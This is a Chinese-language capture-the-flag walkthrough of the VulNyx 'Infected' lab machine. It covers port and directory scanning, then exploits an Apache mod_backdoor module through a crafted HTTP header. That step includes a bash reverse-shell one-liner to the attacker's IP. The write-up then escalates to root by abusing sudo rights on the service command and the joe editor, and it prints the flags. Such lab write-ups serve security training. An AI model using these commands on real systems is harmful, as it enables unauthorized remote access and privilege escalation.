Vlx_Infected

靶机来源：https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 17:36 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00030s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00060s latency).
MAC Address: 08:00:27:8E:AB:36 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.65
Host is up (0.0037s latency).
MAC Address: 08:00:27:D1:8D:1E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.50 seconds

靶机IP：192.168.2.65

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.65                         
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 17:37 +0800
Nmap scan report for 192.168.2.65
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:D1:8D:1E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 27.66 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.65 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 17:37 +0800
Nmap scan report for 192.168.2.65
Host is up (0.00096s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
MAC Address: 08:00:27:D1:8D:1E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100  192.168.2.65                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 17:38 +0800
Nmap scan report for 192.168.2.65
Host is up (0.0048s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:D1:8D:1E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 116.46 seconds

二、WEB渗透

1、HTTP 服务

访问80端口，是Apache的默认页面

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.65 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.65
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              php,txt,html,bak,md,db,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 10701]
info.php             (Status: 200) [Size: 114394]
server-status        (Status: 403) [Size: 277]

3、pipinfo信息泄露

查看pipinfo的信息，找到加载了一个mod_backdoor mod_backdoor 是一个利用 Apache2 模块的隐蔽后门。

三、Apache2 mod_backdoor

Apache2 的一个名为 apache2_BackdoorMod 的模块。该模块包含一个后门，允许远程执行命令。 如果在 Backdoor 标头中传递一个参数，服务器随后会解释该参数，从而允许执行命令。

headers = {"Backdoor": command}
┌──(root㉿kali)-[~]
└─#  curl -sX GET -H "Backdoor: id" "http://192.168.2.65"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

反弹shell

┌──(root㉿kali)-[~]
└─#  curl -sX GET -H "Backdoor: bash -c 'bash -i >& /dev/tcp/192.168.2.4/4444 0>&1' " "http://192.168.2.65"

成功获取到www-data权限

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444                         
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.65] 49534
bash: cannot set terminal process group (494): Inappropriate ioctl for device
bash: no job control in this shell
www-data@infected:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

四、权限提升

1、获取laurent权限

查看sudo -l

www-data@infected:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on infected:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on infected:
    (laurent) NOPASSWD: /usr/sbin/service

可以直接执行shell

www-data@infected:/$ sudo -u laurent /usr/sbin/service ../../bin/sh
sudo -u laurent /usr/sbin/service ../../bin/sh
id
uid=1000(laurent) gid=1000(laurent) groups=1000(laurent)

2、获取root权限

查看sudo -l

laurent@infected:/$ sudo -l
sudo -l
Matching Defaults entries for laurent on infected:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User laurent may run the following commands on infected:
    (root) NOPASSWD: /usr/bin/joe

按下 Ctrl + K + !，屏幕上出现了一个输入框，允许运行一个程序。

成功获取到root权限

uid=0(root) gid=0(root) groups=0(root)

五、查看FALG

root@infected:/# cat /root/root.txt /home/laurent/user.txt 
ffb4622f083564d104e0549e201703dc
6b9d5de6ddf297338e9ce2788198540c